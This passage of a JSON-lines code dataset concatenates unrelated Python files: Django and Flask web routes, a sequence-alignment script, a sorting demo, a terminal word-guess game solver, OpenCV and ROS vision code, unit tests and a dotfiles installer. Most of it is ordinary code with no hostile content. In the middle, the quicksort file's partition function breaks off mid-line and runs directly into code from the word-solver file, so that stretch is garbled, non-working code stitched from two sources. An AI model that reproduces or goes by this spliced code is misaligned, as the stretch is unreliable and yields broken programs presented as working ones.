Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom rest_framework import routers\nfrom example import views\n\n\n# API routers\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'colors', views.ColorViewSet)\nrouter.register(r'favs', views.FavoriteColorViewSet)\n\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^api/', include(router.urls)),\n url(r'^update_favs/', views.update_favorite_colors, name='update_favorite_colors'),\n url(r'^admin/', admin.site.urls),\n]\n","sub_path":"getlist_problem/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"263008313","text":"from tkinter import *\n\nclass App:\n def __init__(self, master):\n frame = Frame(master)\n frame.pack()\n\n self.button = Button(\n frame, text=\"QUIT\", fg=\"red\", command=frame.quit\n )\n self.button.pack(side=LEFT)\n\n self.hi_there = Button(frame, text=\"Hello\", command=self.say_hi)\n self.hi_there.pack(side=LEFT)\n self.photo = PhotoImage(file=\"stulejka.gif\")\n\n w=Canvas(master,width=self.photo.width(),height=self.photo.height())\n w.pack()\n\n\n w.create_image(100,100,image=self.photo)\n\n def say_hi(self):\n print(\"hi there, everyone!\")\n\nroot = Tk()\n\napp = App(root)\n\nroot.mainloop()\nroot.destroy() # optional; see description below","sub_path":"chessApp.py","file_name":"chessApp.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"107829236","text":"\ndef greeting(first, last):\n \"\"\"Display a simple greeting.\"\"\"\n greeting = f'Hello, {first} {last}!'\n return greeting.title()\n\n# Loop for input\nwhile True:\n print('\\nPlease tell me your name.')\n f_name = input('First name: ')\n if f_name == 'q':\n break\n l_name = input('Last name: ')\n if l_name == 'q':\n break\n print(greeting(f_name, l_name))\n","sub_path":"Chapter 8/Examples/greeter.py","file_name":"greeter.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"329227644","text":"def readFile(fasta_file):\n\n ''' This function that reads two amino acid sequences into Python strings from a file in FASTA format\n\n This function take as input the file and return as output a tuple (seq1,seq2)\n '''\n\n next(fasta_file) #remove the first header\n lines=fasta_file.readlines() #list containing all the lines\n sequence=''\n sequences=[]\n for line in lines:\n line=line.strip()\n if line.startswith('>'):\n sequences.append(sequence)\n sequence=''\n else:\n sequence+=line\n sequences.append(sequence)\n seq1,seq2=sequences[0],sequences[1]\n return (seq1,seq2)\n\ndef makeDictionary(file,aminoacids):\n\n ''' The function reads a substitution matrix from a file and puts value in a dictionary\n\n Takes in input the file and the amino acids letters. Pairs of aminoa acid letters are\n the keys of the dictionary. 
\ndef makeDictionary(file,aminoacids):\n\n    ''' The function reads a substitution matrix from a file and puts values in a dictionary\n\n    It takes as input the file and the amino acid letters. Pairs of amino acid letters are\n    the keys of the dictionary. The function returns the dictionary\n    '''\n\n    matrix={} # initialize an empty dictionary\n    for aminoacid in aminoacids:\n        row=file.readline().split() # split each line into a list\n        for i in range(len(row)):\n            couple=aminoacid+aminoacids[i]\n            matrix[couple]= float(row[i])\n            matrix[couple[::-1]]=float(row[i]) # also add the reverse couple, as the matrix is symmetric\n    return matrix\n\ndef calcAlignment(seq1,seq2,dictionary,gp=0):\n\n    '''The function finds the best scoring alignment implementing an ungapped exhaustive alignment algorithm.\n\n    The function takes as input the sequences and the scoring matrix; gap penalty is equal to 0. The\n    function will return the best alignment(s) and the score.\n    '''\n\n    if len(seq1) < len(seq2):\n        short,long=seq1,seq2\n    else:\n        short,long=seq2,seq1\n    bestAl=['','',0] # [short sequence, long sequence, best score]\n    for offset in range(len(long)-len(short)+1): # slide the short sequence along the long one\n        score=0\n        for i in range(len(short)):\n            score+=dictionary[short[i]+long[offset+i]] # ungapped: sum substitution scores position by position\n        if score > bestAl[2]: bestAl=[''.join(short),''.join(long),score] #if the score is better replace the sequences\n        elif score == bestAl[2]: bestAl+=[''.join(short),''.join(long),score] #if the score is equal append the sequences\n    return bestAl\n\nfasta_file=open(\"./fasta_file.fasta\",\"r\")\nseq1,seq2=readFile(fasta_file)\n# seq1=\"HAGSGK\"\n# seq2=\"AGKSHAAAA\"\naminoacids=\"ARNDCQEGHILKMFPSTWYV\"\nblosum=open(\"./blosum62.txt\",\"r\")\ndictionary= makeDictionary(blosum,aminoacids)\nbestAl=calcAlignment(seq1,seq2,dictionary)\nprint('\\n'.join(map(str,bestAl))) #map applies str function to each item of bestAl\n","sub_path":"esame 24.04/ungapped_alignment.py","file_name":"ungapped_alignment.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"19950298","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'mysite'\nurlpatterns = [\n    path('users/', views.index, name='index'),\n    path('user/<int:id>/', views.detail, name='detail'),\n    path('user/edit/<int:id>/', views.edit, name='edit'),\n    path('user/add/', views.add, name='add'),\n    path('user/save/', views.save, name='save'),\n    path('departments/', views.departments, name='departments'),\n    # path('remove-department/', views.removeDepartment, name='removeDepartment'),\n]","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"239533655","text":"from typing import List\nimport sys\nimport random\n\n\"\"\"\nQuick sort is mostly used on arrays.\n\nBy using the last element as the pivot every time,\na reverse-sorted array triggers the worst case\nand the time complexity becomes O(n**2)\n\nTo tackle this situation we randomize (shuffle) the given array first,\nwhich removes that worst case\nand turns it into the average case\nwith time complexity O(n log n)\n\nOne downside is that it also turns the best case into the average case.\n\"\"\"\n\ndef randomize(nums: List):\n    for _ in range(len(nums)//2):\n        j = random.randint(0,len(nums)-1)\n        k = random.randint(0,len(nums)-1)\n        nums[k],nums[j]=nums[j],nums[k]\n    return nums\n\ndef partition(nums: List,s: int,e: int,reverse: bool = False):\r\n    i,j=s,s\r\n    while j<e:\r\n        if reverse:\r\n            if nums[j]>nums[e]:\r\n                nums[i],nums[j]=nums[j],nums[i]\r\n                i+=1\r\n        else:\r\n            if nums[j]<nums[e]:\r\n                nums[i],nums[j]=nums[j],nums[i]\r\n                i+=1\r\n        j+=1\r\n    nums[i],nums[e]=nums[e],nums[i] # place the pivot between the two partitions\r\n    return i\r\n\r\ndef quick_sort(nums: List,s: int,e: int,reverse: bool = False):\r\n    if s < e:\r\n        p = partition(nums,s,e,reverse)\r\n        quick_sort(nums,s,p-1,reverse)\r\n        quick_sort(nums,p+1,e,reverse)\r\n    return nums\n\ndef print_wordmap(codewords):\n    for word in codewords:\n        print(\"{0:>{1}}\".format(str(word), wordspace))\n    print()\n    for i,word1 in enumerate(codewords):\n        print(\"{0:>{1}}\".format(str(word1), wordspace))\n        for j,word2 in enumerate(codewords):\n            score = wordmap[i][j][1]\n            print(\"{0:>{1}}\".format(score, wordspace))\n        print()\n\n\ndef print_words(codewords):\n    for word in codewords:\n        if word.valid:\n            print(repr(word))\n    print()\n\n\ndef update_wordmap(j,k,score):\n    wordmap[j][k][1] = score\n    wordmap[k][j][1] = score\n\n
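\n# calculate_score counts position-by-position character matches between two\n# candidate words, the likeness value the solver uses to narrow its guesses.\n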
def calculate_score(word1, word2):\n    score = 0\n    for i in range(len(word1)):\n        if word1[i] == word2[i]:\n            score += 1\n    return score\n\n\ndef is_unsolved(codewords):\n    num_remaining = NUM_CODEWORDS\n    for word in codewords:\n        if not word.valid:\n            num_remaining -= 1\n    return num_remaining > 1\n\n\ndef main():\n    codewords = retrieve_codewords()\n    init_wordmap(codewords)\n    score_words(codewords)\n    print_words(codewords)\n    print_wordmap(codewords)\n    while is_unsolved(codewords):\n        suggested_word = suggest_word(codewords)\n        #try_word(codewords, suggested_word)\n        try_word(codewords)\n        print_words(codewords)\n        print_wordmap(codewords)\n        update_scores(codewords)\n\n    for word in codewords:\n        if word.valid:\n            print()\n            print(\"The codeword is: {word}\".format(word=word))\n\nif __name__ == '__main__':\n    main()\n\n\n","sub_path":"FOHacker.py","file_name":"FOHacker.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"582608916","text":"# Read the camera feed and convert it to grayscale\r\nimport cv2\r\n\r\n# declare the video capture object\r\ncamera_id = 0\r\nvideo = cv2.VideoCapture(camera_id)\r\n\r\nwhile True:\r\n    ret,frame = video.read()\r\n    if ret:\r\n        frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n        cv2.imshow(\"image\",frame)\r\n\r\n    if cv2.waitKey(1) == ord('q'):\r\n        break\r\nvideo.release()\r\ncv2.destroyAllWindows()","sub_path":"btap1.py","file_name":"btap1.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"187875934","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import PoseStamped, Pose\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight\nfrom styx_msgs.msg import Lane\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifierCV, TLClassifier\nimport tf\nimport tf.transformations\nimport cv2\nimport tf_helper\nimport numpy as np\nimport yaml\nimport geometry_msgs.msg\n\n\nSTATE_COUNT_THRESHOLD = 3\n\n\nclass TLDetector(object):\n\n    def __init__(self):\n        rospy.init_node('tl_detector')\n\n        self.car_pose = None\n        self.waypoints = None\n        self.camera_image = None\n        self.lights = []\n        self.traffic_positions = tf_helper.get_given_traffic_lights()\n\n        self.last_traffic_light_state = TrafficLight.UNKNOWN\n        self.last_state = TrafficLight.UNKNOWN\n        self.last_wp = -1\n        self.state_count = 0\n\n        self.last_reported_traffic_light_id = None\n        self.last_reported_traffic_light_time = None\n\n        self.traffic_lights = None\n        self.image = None\n\n        '''\n        /vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and\n        helps you acquire an accurate ground truth data source for the traffic light\n        classifier by sending the current color state of all traffic lights in the\n        simulator. When testing on the vehicle, the color state will not be available. 
You'll need to\n        rely on the position of the light and the camera image to predict it.\n        '''\n\n        config_string = rospy.get_param(\"/traffic_light_config\")\n        self.config = yaml.load(config_string)\n\n        self.bridge = CvBridge()\n\n        self.experiment_environment = rospy.get_param('/experiment_environment', \"site\")\n        self.light_classifier = TLClassifier(self.experiment_environment)\n        # self.light_classifier = TLClassifierCV()\n\n        self.listener = tf.TransformListener()\n\n        rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb, queue_size=1)\n        rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb, queue_size=1)\n\n        rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb, queue_size=1)\n        rospy.Subscriber('/image_color', Image, self.image_cb, queue_size=1)\n\n        self.upcoming_stop_light_pub = rospy.Publisher(\n            '/upcoming_stop_light_position', geometry_msgs.msg.Point, queue_size=1)\n\n        rospy.spin()\n\n    def pose_cb(self, msg):\n\n        self.car_pose = msg.pose\n\n        # For debugging (Ground Truth data)\n        # arguments = [self.traffic_lights, self.car_pose, self.waypoints, self.image]\n        arguments = [self.traffic_positions, self.car_pose, self.waypoints, self.image]\n        are_arguments_available = all([x is not None for x in arguments])\n\n        if are_arguments_available:\n\n            # Get closest traffic light\n            traffic_light = tf_helper.get_closest_traffic_light_ahead_of_car(\n                self.traffic_positions.lights, self.car_pose.position, self.waypoints)\n\n            # These values seem to be wrong - Udacity keeps on putting in config different values than what the camera\n            # actually publishes.\n            # image_width = self.config[\"camera_info\"][\"image_width\"]\n            # image_height = self.config[\"camera_info\"][\"image_height\"]\n\n            # Therefore simply check image size\n            self.camera_image = self.image\n            self.camera_image.encoding = \"rgb8\"\n            cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"bgr8\")\n\n            traffic_light_state = self.light_classifier.get_classification(cv_image)\n\n            # lights_map = {0: \"Red\", 1: \"Yellow\", 2: \"Green\"}\n            # rospy.logwarn(\"Detected light: {}\".format(lights_map.get(traffic_light_state, \"Other\")))\n\n            if traffic_light_state == TrafficLight.RED or traffic_light_state == TrafficLight.YELLOW:\n                self.upcoming_stop_light_pub.publish(traffic_light.pose.pose.position)\n\n    def waypoints_cb(self, lane):\n        self.waypoints = lane.waypoints\n\n    def traffic_cb(self, msg):\n        self.traffic_lights = msg.lights\n\n    def image_cb(self, msg):\n        self.image = msg\n\n\nif __name__ == '__main__':\n    try:\n        TLDetector()\n    except rospy.ROSInterruptException:\n        rospy.logerr('Could not start traffic node.')\n","sub_path":"ros/src/tl_detector/tl_detector.py","file_name":"tl_detector.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"7783312","text":"# -*- mode: python; coding: utf-8 -*-\n# Copyright 2016 the HERA Collaboration\n# Licensed under the 2-clause BSD license.\n\n\"\"\"Testing for `hera_mc.cm_utils`.\"\"\"\n\nimport argparse\nimport sys\nimport subprocess\nimport os\n\nimport pytest\n\nimport hera_mc\nfrom hera_mc import cm_utils, mc\n\n\ndef test_log():\n    from argparse import Namespace\n    a = Namespace(test=True, val=0)\n    cm_utils.log('testing', args=a)\n\n\ndef test_various():\n    a = 'a'\n    args = argparse.Namespace(a='def_test', unittesting='')\n    x = cm_utils.query_default(a, args)\n    assert x == 'def_test'\n    args = argparse.Namespace(a='def_test', unittesting='none')\n    x = cm_utils.query_default(a, args)\n    
assert x is None\n args = argparse.Namespace(a='def_test', unittesting='false')\n x = cm_utils.query_default(a, args)\n assert not x\n args = argparse.Namespace(a='def_test', unittesting='true')\n x = cm_utils.query_default(a, args)\n assert x\n args = argparse.Namespace(a='def_test', unittesting='unittest')\n x = cm_utils.query_default(a, args)\n assert x == 'unittest'\n spk = cm_utils.make_part_key(None, None)\n assert spk == cm_utils.system_wide_key\n a, b, c = cm_utils.split_part_key('a:b:c')\n assert c == 'c'\n is_active = cm_utils.is_active(None, None, None)\n assert is_active\n t_tst = cm_utils.get_astropytime('now')\n out = cm_utils.get_stopdate(t_tst)\n assert out == t_tst\n d = cm_utils.get_time_for_display(None)\n assert d == 'None'\n c = cm_utils.put_keys_in_order(['1:A:Z', '2:B:X'], 'RPN')\n assert c[0] == '1:A:Z'\n\n\n@pytest.mark.parametrize((\"input\", \"expected\"),\n [(None, None), ('Test', 'Test'), (['a', 'b'], 'a,b'), (1, '1')])\ndef test_stringify(input, expected):\n x = cm_utils.stringify(input)\n if expected is not None:\n assert x == expected\n else:\n assert x is expected\n\n\n@pytest.mark.parametrize((\"input\", \"expected\"),\n [('Test', ['Test']),\n ('a,b', ['a', 'b']),\n (['Test'], ['Test']),\n (1, [1]),\n ('1-3', [1, 2, 3])])\ndef test_listify(input, expected):\n x = cm_utils.listify(input)\n assert x == expected\n x = cm_utils.listify(None, None_as_list=False)\n assert x is None\n x = cm_utils.listify(None, None_as_list=True)\n assert x[0] is None\n\n\ndef test_match_list():\n x = cm_utils.match_list(['a', 'b'], 'c', None)\n y = list(x)\n assert y[1][1] == 'c'\n x = cm_utils.match_list('a', ['b', 'c'], 'upper')\n y = list(x)\n assert y[1][0] == 'A'\n x = cm_utils.match_list(1, 2, 'lower')\n y = list(x)\n assert y[0][0] == '1'\n with pytest.raises(ValueError) as ml:\n cm_utils.match_list([1, 2, 3], [1, 2, 3, 4, 5])\n assert str(ml.value).startswith('Lists must be same length')\n with pytest.raises(ValueError) as ml:\n cm_utils.match_list([1], [2], 'x')\n assert str(ml.value).startswith('Invalid case_type.')\n\n\ndef test_peel():\n x = cm_utils.peel_key('X9:V', 'RNP')\n assert x[0] == 'V'\n x = cm_utils.peel_key('X9:V', 'PRN')\n assert x[0] == 'X'\n\n\ndef test_to_upper():\n x = cm_utils.to_upper('a')\n assert x == 'A'\n x = cm_utils.to_upper(['a'])\n assert x[0] == 'A'\n x = cm_utils.to_upper(1)\n assert x == '1'\n x = cm_utils.to_upper(None)\n assert x is None\n\n\ndef test_to_lower():\n x = cm_utils.to_lower('a')\n assert x == 'a'\n x = cm_utils.to_lower(['a'])\n assert x[0] == 'a'\n x = cm_utils.to_lower(1)\n assert x == '1'\n x = cm_utils.to_lower(None)\n assert x is None\n\n\ndef test_verbosity():\n sys.argv = ['test', '-v', '0']\n p = argparse.ArgumentParser()\n cm_utils.add_verbosity_args(p)\n args = p.parse_args()\n x = cm_utils.parse_verbosity(args.verbosity)\n assert x == 0\n x = cm_utils.parse_verbosity(None)\n assert x == 1\n x = cm_utils.parse_verbosity('vv')\n assert x == 3\n with pytest.raises(ValueError) as tv:\n cm_utils.parse_verbosity('x')\n assert str(tv.value).startswith(\"Invalid argument to verbosity\")\n\n\ndef test_datetime():\n from astropy.time import Time\n sys.argv = ['test']\n p = argparse.ArgumentParser()\n cm_utils.add_date_time_args(p)\n args = p.parse_args()\n assert args.date == 'now'\n assert args.time == 0.0\n import datetime\n tout = cm_utils.get_astropytime(datetime.datetime.now())\n assert type(tout) == Time\n tout = cm_utils.get_astropytime(2400001.0)\n assert type(tout) == Time\n pytest.raises(ValueError, 
cm_utils.get_astropytime, 0.0)\n tout = cm_utils.get_astropytime('none')\n assert tout is None\n tout = cm_utils.get_astropytime('2018/1/1', '0.0')\n assert type(tout) == Time\n pytest.raises(ValueError, cm_utils.get_astropytime, '18/1/1')\n tout = cm_utils.get_astropytime('2018/1/1', '12:30:00')\n assert type(tout) == Time\n pytest.raises(ValueError, cm_utils.get_astropytime, '2018/1/1', '0:0:0:0')\n pytest.raises(ValueError, cm_utils.get_astropytime, '2018/1/1', 'x')\n\n\ndef test_put_keys_in_order():\n x = cm_utils.put_keys_in_order(['HH1', 'HH0:A'])\n assert x[0] == 'HH0:A'\n\n\ndef test_get_cm_repo_git_hash():\n cm_hash = cm_utils.get_cm_repo_git_hash(cm_csv_path=mc.test_data_path)\n\n git_hash = subprocess.check_output(['git', '-C', '.', 'rev-parse', 'HEAD'],\n stderr=subprocess.STDOUT).strip()\n\n assert cm_hash, git_hash\n\n example_config_path = os.path.join(os.path.dirname(hera_mc.__path__[0]),\n 'ci', 'example_config.json')\n pytest.raises(ValueError, cm_utils.get_cm_repo_git_hash,\n mc_config_path=example_config_path)\n","sub_path":"hera_mc/tests/test_cm_utils.py","file_name":"test_cm_utils.py","file_ext":"py","file_size_in_byte":5691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"86632727","text":"import unittest\nfrom unittest import mock\nimport os\n\nimport pickle\nfrom itertools import chain\n\nimport json\n\nimport tweepy\nfrom datetime import date\nimport time\n\nfrom orangecontrib.text import twitter\nfrom orangecontrib.text.corpus import Corpus\n\n\ndef get_credentials():\n key = os.environ.get('TWITTER_KEY', '')\n secret = os.environ.get('TWITTER_SECRET', '')\n if key and secret:\n return twitter.Credentials(key, secret)\n return twitter.Credentials('key', 'secret')\n\n\nNO_CREDENTIALS = os.environ.get('TWITTER_KEY', None) is None\nCREDENTIALS_MSG = \"No twitter api credentials have been found.\"\n\n\nclass TestCredentials(unittest.TestCase):\n\n @unittest.skipIf(NO_CREDENTIALS, CREDENTIALS_MSG)\n def test_valid(self):\n credentials = get_credentials()\n self.assertTrue(credentials.valid)\n\n def test_check_bad(self):\n key = twitter.Credentials('bad key', 'wrong secret')\n self.assertFalse(key.valid)\n\n def test_equal(self):\n key1 = twitter.Credentials('key1', 'secret1')\n key2 = twitter.Credentials('key1', 'secret1')\n self.assertEqual(key1, key2)\n\n key2.consumer_secret = 'key2'\n self.assertNotEqual(key1, key2)\n\n self.assertNotEqual(key1, None)\n\n def test_pickle(self):\n key1 = twitter.Credentials('key1', 'secret1')\n pickled = pickle.dumps(key1)\n key2 = pickle.loads(pickled)\n self.assertEqual(key1, key2)\n\n\nclass MyCursor:\n def __init__(self, *args, **kwargs):\n time.sleep(.05)\n self.statuses = tweepy.Status.parse_list(\n None, json.load(open(os.path.join(os.path.dirname(__file__), 'tweets.json'))))\n self.kwargs = kwargs\n self.args = args\n\n def items(self, count):\n return self.statuses[:count]\n\n\n@mock.patch('tweepy.Cursor', MyCursor)\nclass TestTwitterAPI(unittest.TestCase):\n\n def setUp(self):\n self.credentials = get_credentials()\n self.api = twitter.TwitterAPI(self.credentials)\n\n def test_search_callbacks(self):\n self.checker = 0\n\n def on_start():\n self.assertEqual(self.checker, 0)\n self.checker += 1\n\n def on_progress(progress):\n self.assertEqual(self.checker, progress)\n self.checker += 1\n\n def on_finish():\n self.assertEqual(self.checker, 3)\n self.checker += 1\n\n api = twitter.TwitterAPI(self.credentials, on_start=on_start,\n on_progress=on_progress, 
on_finish=on_finish)\n api.search(word_list=['hello'], max_tweets=2, lang='en')\n api.join()\n self.assertEqual(self.checker, 4)\n\n def test_create_corpus(self):\n self.api.search(word_list=['hello'], max_tweets=5)\n self.api.join()\n corpus = self.api.create_corpus()\n self.assertIsInstance(corpus, Corpus)\n self.assertEqual(len(corpus), 5)\n\n def test_crate_corpus_attr_selection(self):\n self.api.search(word_list=['hello'], max_tweets=5)\n self.api.join()\n attributes = ['text', 'created_at', 'author_id']\n corpus = self.api.create_corpus(included_attributes=attributes)\n domain_attributes = [attr.name for attr in chain(corpus.domain.attributes, corpus.domain.metas)]\n self.assertEqual(len(domain_attributes), 3)\n for attr in attributes:\n self.assertIn(attr, domain_attributes)\n\n def test_clear(self):\n self.api.search(word_list=['hello'], max_tweets=5)\n self.api.join()\n self.assertEqual(len(self.api.container), 5)\n\n self.api.reset()\n self.assertEqual(len(self.api.container), 0)\n\n def test_report(self):\n self.api.search(word_list=['hello'], max_tweets=5)\n self.api.join()\n self.assertEqual(len(self.api.history), 1)\n self.assertIsNotNone(self.api.task.report())\n\n def test_geo_util(self):\n point = twitter.coordinates_geoJSON({})\n self.assertIsNone(point[0])\n self.assertIsNone(point[1])\n\n point = twitter.coordinates_geoJSON({'coordinates': [10, 10]})\n self.assertEqual(point[0], 10)\n self.assertEqual(point[1], 10)\n\n def test_build_query(self):\n # https://dev.twitter.com/rest/public/search\n\n query = self.api.build_query(word_list=['hello', 'world'])\n self.assertIn('hello', query)\n self.assertIn('world', query)\n\n query = self.api.build_query(authors=['johndoe'])\n self.assertIn('from:johndoe', query)\n\n query = self.api.build_query(since=date(2016, 10, 9))\n self.assertIn('since:2016-10-09', query)\n\n query = self.api.build_query(until=date(2016, 10, 9))\n self.assertIn('until:2016-10-09', query)\n\n query = self.api.build_query(word_list=['hello', 'world'], allow_retweets=False)\n self.assertIn(' -filter:retweets', query)\n\n\n@mock.patch('tweepy.Cursor', MyCursor)\nclass TestSearch(unittest.TestCase):\n def setUp(self):\n self.credentials = get_credentials()\n self.api = twitter.TwitterAPI(self.credentials)\n\n def test_running(self):\n self.assertFalse(self.api.running)\n self.api.search(word_list=['hello'], max_tweets=5)\n self.assertTrue(self.api.running)\n self.api.disconnect()\n self.assertFalse(self.api.running)\n\n def test_search_disconnect(self):\n self.api.search(word_list=['hello'], max_tweets=20, lang='en')\n self.api.disconnect()\n self.api.join()\n self.assertLess(len(self.api.container), 10)\n","sub_path":"orangecontrib/text/tests/test_twitter.py","file_name":"test_twitter.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616292693","text":"def PatternUnlock(N, hits):\r\n diag = [26, 29, 27, 24, 62, 92, 42, 72, 15, 51, 18, 81, 53, 35, 83, 38]\r\n combination = []\r\n a = 0\r\n summa = 0\r\n SUMMA = []\r\n\r\n for i in range(N - 1):\r\n a = str(hits[i]) + str(hits[i + 1])\r\n combination.append(a)\r\n\r\n for i in range(N - 1):\r\n flag = False\r\n for j in range(len(diag)):\r\n if combination[i] == str(diag[j]):\r\n summa += 2 ** 0.5\r\n flag = True\r\n break\r\n if flag == False:\r\n summa += 1\r\n\r\n summa_itog = int(summa * 100000 + 0.5)\r\n\r\n summa_str = str(summa_itog)\r\n K = len(summa_str)\r\n\r\n summa_list = list(summa_str)\r\n\r\n 
for i in range(K):\r\n if summa_list[i] != \"0\":\r\n SUMMA.append(summa_list[i])\r\n SUMMA = \"\".join(SUMMA)\r\n return SUMMA\r\n","sub_path":"PatternUnlock.py","file_name":"PatternUnlock.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"212296894","text":"from flask import Blueprint, abort, jsonify\nfrom flask_login import current_user, login_required\n\nfrom ..forms import TagForm\n\napi_tag_blueprint = Blueprint(\"api_tag\", __name__)\n\n\n@api_tag_blueprint.route(\"/new\", methods=[\"POST\"])\n@login_required\ndef new():\n form = TagForm()\n if form.validate_on_submit():\n subscription = current_user.subscriptions.filter_by(\n channel_id=form.channel_id.data\n ).first_or_404()\n response = subscription.add_tag(form.tag_name.data)\n return jsonify(str(response))\n abort(403)\n","sub_path":"tubee/routes/api_tag.py","file_name":"api_tag.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"137262329","text":"from app import app,db,api\nfrom flask import render_template,redirect,url_for,session,flash\nfrom app.forms import LoginForm,RegisterForm,AddNewsForm\nfrom app.models import User,News\nfrom flask_restplus import Resource\nimport uuid\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n\treturn render_template('index.html')\n\n@app.route(\"/news\")\ndef news():\n\tclasses=News.objects().all()\n\treturn render_template('news.html',classes=classes)\n\n@app.route(\"/deletenews/\")\ndef deletenews(idx):\n\tif News.objects().count()>0:\n\t\tNews.objects(news_id=idx).delete()\n\treturn redirect(url_for('news'))\n\n@app.route(\"/addnews\",methods=[\"GET\",\"POST\"])\ndef addnews():\n\tform=AddNewsForm()\n\tif form.validate_on_submit():\n\t\tid=uuid.uuid4()\n\t\tnews_id=str(id.int)\n\t\twhile News.objects(news_id=news_id).first():\n\t\t\tid=uuid.uuid4()\n\t\t\tnews_id=str(id.int)\n\t\theadline=form.headline.data\n\t\tdescription=form.description.data\n\t\tcat_news=form.cat_news.data\n\t\tauthor_name=session.get(\"username\")\n\t\tnews=News(news_id=news_id,description=description,headline=headline,author_name=author_name,cat_news=cat_news)\n\t\tnews.save()\n\t\tflash(f\"News is successfully published!\",\"success\")\n\treturn render_template('addnews.html',form=form)\n\n@app.route(\"/contact\")\ndef contact():\n\treturn render_template('contact.html')\n\n@app.route(\"/logout\",methods=[\"GET\",\"POST\"])\ndef logout():\n\tsession[\"user_id\"]=False\n\tsession.pop(\"username\",None)\n\treturn redirect(url_for(\"login\"))\n\n@app.route(\"/login\",methods=[\"GET\",\"POST\"])\ndef login():\n\tif session.get(\"username\"):\n\t\treturn redirect(url_for('index'))\n\tform=LoginForm()\n\tif form.validate_on_submit():\n\t\temail=form.email.data\n\t\tpassword=form.password.data\n\t\tuser=User.objects(email=email).first()\n\t\tif user and user.get_password(password):\n\t\t\tflash(f\"{user.first_name}, You are successfully logged in!\",\"success\")\n\t\t\tsession[\"user_id\"]=user.user_id\n\t\t\tsession[\"username\"]=user.first_name\n\t\t\tsession[\"email\"]=user.email\n\t\t\treturn redirect(url_for('index'))\n\t\tflash(\"Sorry, something went wrong!\", \"danger\")\n\treturn render_template('login.html',form=form)\n\n@app.route(\"/register\",methods=[\"GET\",\"POST\"])\ndef register():\n\tif session.get('username'):\n\t\treturn redirect(url_for('index'))\n\tform=RegisterForm()\n\tif 
form.validate_on_submit():\n\t\tuser_id=User.objects.count()\n\t\tuser_id+=1\n\t\temail=form.email.data\n\t\tif User.objects(email=email).first():\n\t\t\tflash(\"Email already exists!\", \"danger\")\n\t\t\treturn redirect(\"/register\")\n\t\tpassword=form.password.data\n\t\tfirst_name=form.first_name.data\n\t\tlast_name=form.last_name.data\n\t\tuser=User(user_id=user_id,email=email,first_name=first_name,last_name=last_name)\n\t\tuser.set_password(password)\n\t\tuser.save()\n\t\tflash(f\"You are successfully registered!\",\"success\")\n\t\treturn redirect(url_for('login'))\n\treturn render_template('register.html',form=form)\t","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"264594616","text":"#!/usr/bin/env python3\n\nSTUFF = [\n ('directory', '.oh-my-zsh'),\n ('tree', '.config'),\n ('files-in', '')\n]\n\n\nimport os, sys, stat, glob\n\nREPO = os.path.abspath(os.path.dirname(__file__))\nHOME = os.getenv('HOME')\n\ndef srcpath(stem):\n return os.path.join(REPO, stem)\ndef dstpath(stem):\n return os.path.join(HOME, stem)\n\nIGNORE_IN_ROOT = ('.git', '.gitmodules', os.path.basename(__file__))\n\n\ndef symlinks():\n\n def each(thing):\n mode, stem = thing\n src = srcpath(stem)\n if mode == 'directory':\n assert os.path.isdir(src)\n yield stem\n elif mode == 'tree':\n assert os.path.isdir(src)\n for path, dirs, files in os.walk(src):\n relpath = os.path.relpath(path, REPO)\n yield from map(\n lambda filename: os.path.join(relpath, filename),\n files\n )\n elif mode == 'files-in':\n entries = os.scandir(src)\n if stem == '':\n entries = filter(\n lambda e: e.name not in IGNORE_IN_ROOT,\n entries)\n yield from map(\n lambda entry: os.path.join(stem, entry.name),\n filter(lambda entry: entry.is_file(), entries)\n )\n else:\n raise ValueError(mode)\n\n for thing in STUFF:\n yield from each(thing)\n\n\ndef 